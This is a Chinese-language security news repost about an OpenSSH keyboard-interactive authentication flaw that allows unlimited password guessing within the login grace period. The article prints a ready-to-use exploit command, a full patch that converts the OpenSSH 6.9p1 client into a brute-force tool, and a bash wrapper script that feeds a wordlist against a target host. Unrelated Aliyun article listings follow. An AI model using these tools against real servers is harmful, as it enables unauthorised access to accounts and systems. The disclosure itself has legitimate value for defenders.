OpenSSH漏洞可导致服务器被暴力破解 研究人员公布利用方法

简介: 本文讲的是 OpenSSH漏洞可导致服务器被暴力破解 研究人员公布利用方法,利用安全远程访问工具OpenSSH中的一个漏洞,攻击者可绕过认证重试次数的限制,进行大量的口令猜解。

本文讲的是 OpenSSH漏洞可导致服务器被暴力破解 研究人员公布利用方法,利用安全远程访问工具OpenSSH中的一个漏洞,攻击者可绕过认证重试次数的限制,进行大量的口令猜解。一位网名为Kingcope的安全人员近日在博客上发布了这个漏洞的利用方法。

image

OpenSSH服务器的“键盘交互”认证是打开的,默认设置为允许6次认证尝试,客户端只允许3次,然后就会关闭与服务器的连接。然而,这个认证机制可以在单次连接中进行多次认证尝试。利用这个漏洞,攻击者能够在允许登录时间的2分钟内进行多次口令尝试,也就意味着成千上万次的暴力破解。

而且,即使在OpenSSH的配置中把口令认证设置成“no”并使用公共密钥认证也无法防止这种攻击。

漏洞利用方法:

ssh -lusername -oKbdInteractiveDevices=`perl -e ‘print “pam,” x 10000’` targethost

这条命令可以在登录时间尝试多达10000个口令。下面是openssh-6.9p1的攻击补丁,打上这个补丁之后即可执行远程破解:

—分割线–

diff openssh-6.9p1/sshconnect2.c openssh-6.9p1-modified/sshconnect2.c

83a84,85

> char password[1024];

>

510c512,517

< authctxt->success = 1; /* break out */

—

> printf(“==============================================\n”);

> printf(“*** SUCCESS **********************************\n”);

> printf(“*** PASSWORD: %s\n”, password);

> printf(“==============================================\n”);

> exit(0);

>

1376a1384,1385

> char *devicebuffer;

> int i;

1386a1396,1405

> devicebuffer = calloc(1, 200000);

> if (!devicebuffer) {

> fatal(“cannot allocate devicebuffer”);

> }

>

> for (i=0;i<200000-2;i+=2) {

> memcpy(devicebuffer + i, “p,”, 2);

> }

> devicebuffer[200000] = 0;

>

1393,1394c1412

< packet_put_cstring(options.kbd_interactive_devices ?

< options.kbd_interactive_devices : “”);

—

> packet_put_cstring(devicebuffer);

1408c1426

< char *name, *inst, *lang, *prompt, *response;

—

> char *name, *inst, *lang, *prompt;

1410c1428

< int echo = 0;

—

> char *pos;

1425a1444

>

1430a1450

>

1443,1449c1463,1469

< echo = packet_get_char();

<

< response = read_passphrase(prompt, echo ? RP_ECHO : 0);

<

< packet_put_cstring(response);

< explicit_bzero(response, strlen(response));

< free(response);

—

> packet_get_char();

> if (fgets(password, 1024, stdin) == NULL)

> exit(0);

> if ((pos=strchr(password, ‘\n’)) != NULL)

> *pos = ”;

> printf(“%s\n”, password);

> packet_put_cstring(password);

—分割线—

补丁打上之后,即可使用下面的shell脚本挂上词汇表进行口令破解的尝试:

—分割线—

#!/bin/bash

# run as:

# cat wordlist.txt | ./sshcracker.sh ssh-username ssh-target

#

while true

do

./ssh -l$1 $2

rc=$?; if [[ $rc == 0 ]]; then exit $rc; fi

echo Respawn due to login grace time…

done

—分割线—

例如:

cat wordlist.txt | ./sshcracker.sh test 192.168.2.173

该攻击已经在FreeBSD 10.1系统及老版本如6.2上成功测试。

原文发布时间为:七月 24, 2015
本文作者:Recco
本文来自云栖社区合作伙伴安全牛,了解相关信息可以关注安全牛。
原文链接:http://www.aqniu.com/threat-alert/8909.html

相关文章
|
6天前
|
弹性计算 异构计算
2024年阿里云GPU服务器多少钱1小时?亲测价格查询方法
2024年阿里云GPU服务器每小时收费因实例规格不同而异。可通过阿里云GPU服务器页面选择“按量付费”查看具体价格。例如,NVIDIA A100的gn7e实例为34.742元/小时,NVIDIA A10的gn7i实例为12.710156元/小时。更多详情请访问阿里云官网。
39 2
|
8天前
|
人工智能 弹性计算 关系型数据库
学生免费领取阿里云服务器一年的方法,以及各种活动
学生可以免费领取阿里云服务器一年,新人可获2核4G,非新人2核2G。访问链接注册并完成学生认证,领取300元无门槛优惠券,购买轻量应用服务器。此外,还有多项活动可赢取实物奖品。
54 2
|
1月前
|
弹性计算 安全 Linux
阿里云国际版使用ping命令测试ECS云服务器不通的排查方法
阿里云国际版使用ping命令测试ECS云服务器不通的排查方法
|
17天前
|
Web App开发 安全 网络安全
tplink虚拟服务器设置方法
为了更全面地理解云服务及其在企业应用中的角色,推荐访问,他们提供了一系列高性能、安全稳定的云服务器解决方案,包括但不限于香港云服务器、高防服务器等,特别适合寻求全球化业务扩展的企业。蓝易云不仅拥有全球化的基础设施布局,还提供针对各种行业定制的全栈云解决方案,助力企业实现云端部署,跨越传统界限,即刻启航云端之旅。
24 0
|
21天前
|
前端开发 Docker 容器
主机host服务器和Docker容器之间的文件互传方法汇总
Docker 成为前端工具,可实现跨设备兼容。本文介绍主机与 Docker 容器/镜像间文件传输的三种方法:1. 构建镜像时使用 `COPY` 或 `ADD` 指令;2. 启动容器时使用 `-v` 挂载卷;3. 运行时使用 `docker cp` 命令。每种方法适用于不同场景,如静态文件打包、开发时文件同步及临时文件传输。注意权限问题、容器停止后的文件传输及性能影响。
|
2月前
|
Java
java小工具util系列5:java文件相关操作工具,包括读取服务器路径下文件,删除文件及子文件,删除文件夹等方法
java小工具util系列5:java文件相关操作工具,包括读取服务器路径下文件,删除文件及子文件,删除文件夹等方法
52 4
|
24天前
|
弹性计算 数据安全/隐私保护 Windows
阿里云国际版无法远程连接Windows服务器的排查方法
阿里云国际版无法远程连接Windows服务器的排查方法
|
1月前
|
域名解析 弹性计算 安全
无法ping通ECS服务器公网IP的排查方法
无法ping通ECS服务器公网IP的排查方法
|
2月前
|
数据安全/隐私保护
服务器备份的常见方法包括完全备份、增量备份、差异备份和实时备份
服务器备份的常见方法包括完全备份、增量备份、差异备份和实时备份
368 3
|
2月前
|
数据安全/隐私保护
服务器备份有哪些方法?
服务器备份有哪些方法?
124 1

热门文章

最新文章